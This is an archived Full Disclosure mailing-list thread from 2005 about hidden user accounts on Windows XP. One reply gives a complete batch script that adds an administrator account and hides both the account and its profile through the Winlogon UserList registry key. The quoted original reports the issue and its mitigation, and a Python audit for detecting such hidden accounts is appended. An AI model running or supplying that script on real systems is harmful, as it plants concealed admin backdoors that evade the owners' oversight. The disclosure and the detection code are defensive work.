Full Disclosure mailing list archives

Re: hidden users on windows?


From: Ill will <xillwillx () gmail com>
Date: Thu, 4 Aug 2005 09:16:55 -0400

old news for XP
  
@echo off

@echo HideUserXP.bat

@echo by illwill http://illmob.org

@echo This will create a hidden user with admin rights in XP

@echo ( hidden meaning that the username wont appear in the logon screen)

@echo To log on to your hidden account, you need to use the Log On To Windows dialog box by pressing Ctrl + Alt + Delete twice.

@echo Make sure you're logged off all accounts. You can't just switch users.

net user illwill password /add && net localgroup administrators illwill /add

echo Windows Registry Editor Version 5.00> c:\hide.reg

echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\hide.reg

echo "illwill"=dword:00000000>> c:\hide.reg

REGEDIT /S c:\hide.REG

DEL /Q c:\hide.REG

attrib +r +a +s +h %SystemDrive%\docume~1\illwill

Exit


 On 8/3/05, nabiy <nathan.aguirre () gmail com> wrote: 

Hello,

A security issue has been identified in current versions of Windows
that allows 'hidden' user accounts. The User Account Manager in the
Windows Control Panel and the 'Welcome Screen' both fail to report
interactive logons made with the netapi. This security issue has been
verified on Windows 2000 Professional, Windows XP Home Edition and
Windows XP Professional. Microsoft was notified of this issue on July
28, 2005. The problem is not with the netapi or the ability to create
users but with the User Account Manager in Windows. It simply fails to
list all of the users that are on the system.

This issue was noticed while exploring the netapi on Windows – users
created with the netuseradd function failed to show up in both the
User Account Manager and on the Welcome Screen. The failure to list
users made with the netapi presents a problem for obvious reasons;
home users and even administrators expect to see all of the users on
their system when using these facilities.

The solution in all versions of Windows is simple. Do not depend on
the User Account Manager when managing user accounts on your system.
Instead, users should use the Local Users and Groups management snap-in
or the net command from the cli.

More information has been documented at http://neworder.box.sk

nathan aguirre
--
http://nabiy.sdf1.org . gopher://sdf.lonestar.org/11/users/nabiy
The Super Dimension Fortress Public Access Unix System

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/




-- 
- illwill
http://illmob.org
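
An audit for the hiding method used in the batch file above, as an added example that is not part of the original thread: it parses a decoded .reg export of the SpecialAccounts\UserList key and cross-checks it against account lists taken from `net user` and `net localgroup administrators`. The function names, severity labels and sample data are constructed for illustration.

```python
import re

# Key written by the script above; value 0 is what it uses to hide an account.
USERLIST_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT"
                r"\CurrentVersion\Winlogon\SpecialAccounts\UserList")
VALUE_RE = re.compile(r'"(.+)"=dword:([0-9a-fA-F]{8})')

def parse_userlist(reg_text):
    """Return {account: dword} for the values under UserList in a .reg export."""
    values, in_key = {}, False
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("["):  # a new key header starts or ends our section
            in_key = line.strip("[]").lower() == USERLIST_KEY.lower()
            continue
        match = VALUE_RE.fullmatch(line)
        if in_key and match:
            values[match.group(1)] = int(match.group(2), 16)
    return values

def audit(reg_text, local_users, administrators):
    """Return (severity, account) pairs for accounts hidden with dword 0."""
    users = {u.lower() for u in local_users}
    admins = {a.lower() for a in administrators}
    rank = {"high": 0, "medium": 1, "info": 2}
    findings = []
    for name, value in parse_userlist(reg_text).items():
        if value != 0:  # only the value the script above writes is flagged
            continue
        key = name.lower()
        # hidden admin > hidden existing account > stale entry with no account
        severity = "high" if key in admins else "medium" if key in users else "info"
        findings.append((severity, name))
    return sorted(findings, key=lambda f: (rank[f[0]], f[1].lower()))

# Constructed sample data (not from a real host): a decoded .reg export and the
# account names an analyst would copy from `net user` / `net localgroup administrators`.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"svc_backup"=dword:00000000
"illwill"=dword:00000000
"kiosk"=dword:00000001
'''
SAMPLE_USERS = ["Administrator", "Guest", "svc_backup", "illwill", "kiosk"]
SAMPLE_ADMINS = ["Administrator", "illwill"]
if __name__ == "__main__":
    for severity, name in audit(SAMPLE_REG, SAMPLE_USERS, SAMPLE_ADMINS):
        print(f"{severity:6} {name}")
```

Exports written by regedit are normally UTF-16, so decode the file before passing its text to `parse_userlist`.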
